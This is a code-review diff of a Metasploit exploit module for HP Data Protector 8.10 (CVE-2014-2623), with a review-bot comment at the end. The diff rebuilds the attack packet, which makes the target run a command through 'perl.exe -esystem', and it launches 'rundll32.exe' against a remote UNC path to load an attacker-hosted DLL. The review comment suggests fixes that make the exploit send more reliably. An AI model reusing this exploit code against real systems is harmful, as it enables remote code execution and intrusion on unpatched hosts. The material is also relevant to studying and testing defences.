Clean packet building
parent
e04ff3ee24
commit
62dde22d88
|
@ -26,8 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2014-2623'],
|
||||
['OSVDB', '109069'],
|
||||
['EDB', '34066'],
|
||||
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
|
||||
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -37,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
|
||||
[ 'HP Data Protector 8.10 / Windows', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 02 2014'))
|
||||
|
@ -90,21 +91,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
|
||||
end
|
||||
|
||||
def exec_bar(cmd)
|
||||
def send_pkt(cmd)
|
||||
cmd.gsub!("\\", "\\\\\\\\")
|
||||
|
||||
cmd_no = target['Offset'] + cmd.length
|
||||
|
||||
pkt = "\x00\x00\x00"
|
||||
pkt << cmd_no
|
||||
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
|
||||
pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
|
||||
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
|
||||
pkt << "('#{cmd}')" # Executable
|
||||
pkt << "\x00"
|
||||
pkt = "2\x00"
|
||||
pkt << "\x01\x01\x01\x01\x01\x01\x00"
|
||||
pkt << "\x01\x00"
|
||||
pkt << "\x01\x00"
|
||||
pkt << "\x01\x00"
|
||||
pkt << "\x01\x01\x00 "
|
||||
pkt << "28\x00"
|
||||
pkt << "\\perl.exe\x00 "
|
||||
pkt << "-esystem('#{cmd}')\x00"
|
||||
|
||||
connect
|
||||
sock.put(pkt)
|
||||
sock.put([pkt.length].pack('N') + pkt)
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -114,6 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("#{peer} - Trying to execute remote DLL...")
|
||||
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
|
||||
exec_bar(sploit)
|
||||
send_pkt(sploit)
|
||||
end
|
||||
end
|
||||
|
|
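Review bot: The length prefix in the send_pkt hunk is computed from `pkt.length`, which is a character count, not a byte count; since `cmd` is interpolated into the packet and the surrounding string literals are built with `\x00` escapes, the prefix should be derived from bytes, i.e. `sock.put([pkt.bytesize].pack('N') + pkt)`. For the ASCII-only command built in the exploit hunk (`rundll32.exe #{unc},…`) the two agree, so this is a latent rather than an observed bug, but it is the kind that surfaces when SRVHOST or the UNC path ever carries a non-ASCII character. The `connect` / `sock.put` / `disconnect` sequence has no `ensure`, so an exception raised by the write skips `disconnect`; wrapping the put in `begin … ensure disconnect end` keeps the socket from leaking on a failed send. Separately, `cmd.gsub!("\\", "\\\\\\\\")` mutates the caller's string in place — harmless for the single `sploit` local visible in the last hunk, but `cmd = cmd.gsub("\\", "\\\\\\\\")` would make the helper safe to call with a string the caller reuses. Presumably the service expects a 4-byte big-endian length followed by the body; that framing is inferred from the hunk, not documented, and a one-line comment such as `# 4-byte big-endian length prefix, then the raw request` above the put would help the next reader.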